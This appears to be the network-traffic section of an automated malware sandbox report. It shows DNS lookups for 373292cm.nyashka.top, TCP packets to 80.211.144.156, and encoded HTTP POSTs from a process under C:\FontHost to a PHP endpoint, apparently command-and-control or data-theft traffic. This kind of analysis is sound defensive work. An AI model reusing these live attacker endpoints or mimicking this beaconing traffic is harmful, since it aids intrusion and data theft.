                              Aug 25, 2024 15:44:57.289798975 CEST805995980.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.289890051 CEST5995980192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:57.292093039 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.292181969 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:57.292257071 CEST805995980.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.292309999 CEST5995980192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:57.294213057 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:57.299900055 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.647624016 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:57.652746916 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.652767897 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.652779102 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:57.959919930 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.006958008 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.090172052 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.131944895 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.206356049 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.206926107 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.211671114 CEST805996080.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.211746931 CEST5996080192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.211777925 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.211847067 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.211956024 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.216751099 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.569530964 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.574810028 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.574825048 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.574831963 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.882006884 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.928776026 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.929701090 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.930263996 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.935539007 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.935617924 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.936000109 CEST805996180.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:58.936057091 CEST5996180192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.949229002 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:58.954186916 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.133691072 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.138798952 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.138904095 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.139019012 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.143917084 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.309318066 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.314363956 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.314426899 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.514998913 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.520010948 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.520026922 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.520035982 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.607373953 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.647552013 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.730150938 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.772536039 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.811819077 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.866301060 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:44:59.938560009 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:44:59.991338015 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.065732002 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.065733910 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.066531897 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.070939064 CEST805996280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.071017027 CEST5996280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.071413040 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.071485043 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.071594954 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.071763039 CEST805996380.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.071818113 CEST5996380192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.076983929 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.429095030 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.435986042 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.436028004 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.436058998 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.748614073 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:00.803854942 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:00.953639030 CEST805996480.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.007013083 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.082544088 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.087585926 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.087677002 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.087779045 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.092694998 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.444531918 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.449664116 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.449717999 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.449747086 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.758934975 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.803930998 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:01.890233994 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:01.944555998 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.029287100 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.036606073 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.037067890 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.091202974 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.096117020 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.097060919 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.097172976 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.103880882 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.444523096 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.449376106 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.449398041 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.449408054 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.759957075 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.803790092 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.956305027 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.006903887 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.094523907 CEST5995880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.094630957 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.097012997 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.097932100 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.102957964 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.103058100 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.103476048 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.103554010 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.103687048 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.109508991 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.460359097 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.465401888 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.465429068 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.465439081 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.768834114 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.819418907 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.902116060 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.944461107 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.019093990 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.019388914 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.026401997 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.026542902 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.029102087 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.029145956 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.029376984 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.034341097 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.382008076 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.389507055 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.389522076 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.389530897 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.712289095 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.756948948 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.893264055 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.944571972 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.999630928 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.006390095 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.006525993 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.008440018 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.013350964 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.047703981 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.052906990 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.053018093 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.053097010 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.058162928 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.366764069 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.371854067 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.371957064 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.397761106 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.402690887 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.402867079 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.402882099 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.673413992 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.725688934 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.766819954 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.801935911 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.819416046 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.850660086 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.901094913 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.944417000 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018779039 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018817902 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018986940 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.019604921 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.024112940 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.024224997 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.024979115 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.025053978 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.025188923 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.026221991 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.026279926 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.026314974 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.026371002 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.030071020 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.382245064 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.387216091 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.387319088 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.387329102 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.696506023 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.743274927 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.830126047 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.881931067 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.197391987 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.202338934 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:07.202471018 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.202613115 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.207556009 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.788630962 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.788970947 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.789200068 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.789294004 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:08.790740013 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:13.602370024 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:13.913201094 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:14.017138004 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.017232895 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:14.017394066 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.018649101 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.018656969 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.022559881 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.022571087 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.315907955 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.366313934 CEST5997280192.168.2.580.211.144.156

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 25, 2024 15:43:28.178508043 CEST5766553192.168.2.51.1.1.1
                              Aug 25, 2024 15:43:28.530394077 CEST53576651.1.1.1192.168.2.5
                              Aug 25, 2024 15:43:33.061815023 CEST5349466162.159.36.2192.168.2.5
                              Aug 25, 2024 15:43:33.583275080 CEST6455553192.168.2.51.1.1.1
                              Aug 25, 2024 15:43:33.591088057 CEST53645551.1.1.1192.168.2.5
                              Aug 25, 2024 15:43:35.400705099 CEST5360653192.168.2.51.1.1.1
                              Aug 25, 2024 15:43:36.177900076 CEST53536061.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 25, 2024 15:43:28.178508043 CEST192.168.2.51.1.1.10xdcfbStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                              Aug 25, 2024 15:43:33.583275080 CEST192.168.2.51.1.1.10xac19Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                              Aug 25, 2024 15:43:35.400705099 CEST192.168.2.51.1.1.10x4a2Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 25, 2024 15:43:28.530394077 CEST1.1.1.1192.168.2.50xdcfbNo error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false
                              Aug 25, 2024 15:43:33.591088057 CEST1.1.1.1192.168.2.50xac19Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                              Aug 25, 2024 15:43:36.177900076 CEST1.1.1.1192.168.2.50x4a2No error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • 373292cm.nyashka.top

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.54971280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:28.549983025 CEST345OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 344
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:28.923659086 CEST344OUTData Raw: 05 06 01 02 03 08 04 07 05 06 02 01 02 06 01 06 00 03 05 08 02 00 03 0c 01 01 0d 07 07 57 06 02 0d 03 04 59 07 00 05 52 0c 03 06 0a 00 06 07 0f 05 03 0c 0c 0d 01 05 04 06 0f 07 06 07 05 06 09 00 04 0d 5d 07 55 01 08 0c 01 0c 55 0d 0c 0c 09 07 51
                              Data Ascii: WYR]UUQQT\L~`e]cryvuR~ofXwloYkctoUoo^jJCkSwYh}_~V@B{mvA~ra
                              Aug 25, 2024 15:43:29.218148947 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:29.322532892 CEST1236INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 1320
                              Connection: keep-alive
                              Data Raw: 56 4a 7e 4c 78 7d 77 44 7b 72 67 59 7f 5f 5e 59 6a 49 7b 42 7f 59 79 08 7a 70 70 05 7e 62 73 59 77 73 58 50 7a 58 6a 5e 77 65 7b 5f 69 61 78 01 55 4b 71 09 74 5c 7f 4b 7f 04 75 04 7f 5e 62 0d 79 66 60 08 7e 73 7f 4a 62 62 5f 06 60 58 6a 59 7e 62 62 02 7f 7f 70 4e 7e 5e 77 06 62 5c 7b 06 7c 5c 7e 5a 7d 4e 6a 58 78 59 78 4d 78 77 7b 5e 79 6d 7b 04 78 61 64 49 7b 5d 6e 4f 7c 60 6f 5a 7b 5e 7c 07 7e 4c 51 4d 61 62 64 47 7a 51 41 5b 68 5e 7c 40 7f 71 6e 54 76 52 6b 5f 6f 6c 74 03 77 06 6e 0d 79 62 6d 47 6a 42 54 06 6f 72 66 46 77 63 5e 5a 76 07 64 07 76 71 7a 50 7e 5d 7a 06 77 04 7d 05 61 65 52 09 68 42 65 01 77 7c 78 04 7f 73 6c 02 78 6c 60 5a 7a 60 65 5a 6b 6d 6b 51 74 74 7c 04 7e 61 72 09 7e 43 63 42 78 7d 65 5e 7d 71 69 04 7b 5d 46 51 6b 52 5d 52 7d 60 56 0b 7d 77 75 5d 6c 6d 7b 49 7b 71 64 00 7e 71 78 5b 7e 49 55 0a 68 4e 5c 55 7b 63 78 07 7d 61 7c 49 63 5a 7d 51 7b 5c 79 06 75 66 56 4b 7e 58 56 06 7e 66 71 0d 76 72 73 06 7f 5c 5b 05 7f 67 6a 0d 7b 58 74 09 7e 73 67 02 76 62 75 02 76 71 69 00 7c 4f [TRUNCATED]
                              Data Ascii: VJ~Lx}wD{rgY_^YjI{BYyzpp~bsYwsXPzXj^we{_iaxUKqt\Ku^byf`~sJbb_`XjY~bbpN~^wb\{|\~Z}NjXxYxMxw{^ym{xadI{]nO|`oZ{^|~LQMabdGzQA[h^|@qnTvRk_oltwnybmGjBTorfFwc^ZvdvqzP~]zw}aeRhBew|xslxl`Zz`eZkmkQtt|~ar~CcBx}e^}qi{]FQkR]R}`V}wu]lm{I{qd~qx[~IUhN\U{cx}a|IcZ}Q{\yufVK~XV~fqvrs\[gj{Xt~sgvbuvqi|Or~|t@~gDuOY{Ly~`iywtxg^MxSYHybdHzcz}``{gx~\svap||Q}g`|qaAv|Zx|tIt`byqeJ~RfxOfFvsswa^var|NrtLiBv[`RyLwRp|]hJxBz`v}`wgR~rvB}SU{mnN}\y}pxAlZNph}YT{CQ{bt~qg}wQ@~`Wys^M}rtFtMqBzO[IuHZ}f|}vu@wbQ\}|gzxXZO~ssubaAtOiqbI~BlA~IUuO{rqI}N_{whywpxCQzblHxsPL{]NZxYsY~qx\wa|}BUYh@}bqAvRwZolUYw^vzqm}BT_z\yvxBagx[L~Jx^bcrT^veoSkRv^wk_|p|K{oglNXh}l`g^jaqTzSYQfn^jfbQYwRS{@QlkPWta^o~Zzu{Z|Xg}Yg~puncx~rtK`]amOj^vcY|fdfive{WOz[hdNTzoVR`V[[nN]bnJUvzyRRL~wkFua{Jy\uJz]OZloBUtAl^Do{AQ\_}]s|lkVTdaNYLwtR`d{ZFQhbO[Ao]Da}UnXFQQz|^]\NtiZDp\@PkeAZq@bUMizYcUCS\wElc[z]zZ~zsWcdAR~aVRn^VTaXQaB [TRUNCATED]
                              Aug 25, 2024 15:43:29.322582960 CEST241INData Raw: 44 50 7e 66 5b 53 64 06 5f 6f 00 00 09 51 59 60 49 5d 63 0d 5e 5b 62 6d 59 7e 5c 79 67 52 55 59 09 6a 64 63 54 6d 06 60 58 51 71 6e 4a 7a 73 01 5e 7f 76 7f 40 6c 6b 73 45 6f 0b 77 58 7b 75 7f 5f 6f 60 0e 41 50 7c 6f 5d 57 64 00 55 6a 04 0f 42 5c
                              Data Ascii: DP~f[Sd_oQY`I]c^[bmY~\ygRUYjdcTm`XQqnJzs^v@lksEowX{u_o`AP|o]WdUjB\rYEiocShf}qQpE|UU][uJPbP@QT\WY`_Z[gy`bUx^\^p_O\boNRHcU@iA[RZQca_{SVPpZN_jaNP~No[ChHAPYUHVpoRjgxzZ~G|TV_TsBUbVCQ_PcTQZ@je|p^zRm
                              Aug 25, 2024 15:43:30.143950939 CEST321OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 384
                              Expect: 100-continue
                              Aug 25, 2024 15:43:30.348388910 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:30.348594904 CEST384OUTData Raw: 5a 51 59 57 54 49 54 59 5b 5f 5a 51 59 52 58 57 57 5b 5d 52 57 5e 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQYWTITY[_ZQYRXWW[]RW^SYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X,U?E"'#5]=3<>:+[7X"/+#2,*:?^ =,>&F$.Y/1
                              Aug 25, 2024 15:43:30.635669947 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:30 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 54 3d 1b 36 58 27 2b 2c 16 24 23 0c 1e 3d 04 2b 58 2b 2d 08 07 33 06 2d 5f 26 58 30 56 33 02 35 5a 3c 3e 04 50 26 01 0e 05 2e 1e 2b 5d 0c 13 21 04 37 14 31 05 26 2c 37 02 2a 06 20 04 20 3c 0b 05 2b 3a 07 55 2b 2c 3f 00 3f 29 0a 00 28 29 2a 1e 3b 28 0b 16 2e 23 31 0c 23 3e 2b 52 0d 11 27 0c 3f 3d 21 10 2a 3d 20 06 22 01 3c 07 24 03 0c 13 31 32 2e 54 24 2a 2c 12 26 0c 18 0c 30 32 39 51 31 2b 0c 59 31 59 3a 08 22 08 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &T=6X'+,$#=+X+-3-_&X0V35Z<>P&.+]!71&,7* <+:U+,??)()*;(.#1#>+R'?=!*= "<$12.T$*,&029Q1+Y1Y:"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.54971380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:30.960289001 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:31.319657087 CEST1808OUTData Raw: 5a 51 59 53 54 42 54 5f 5b 5f 5a 51 59 5e 58 52 57 5a 5d 5e 57 50 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQYSTBT_[_ZQY^XRWZ]^WPSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;#+D! X#)]*=(!\+-$4</W4$+)07#)_,&F$.Y/
                              Aug 25, 2024 15:43:31.628186941 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:31.758878946 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
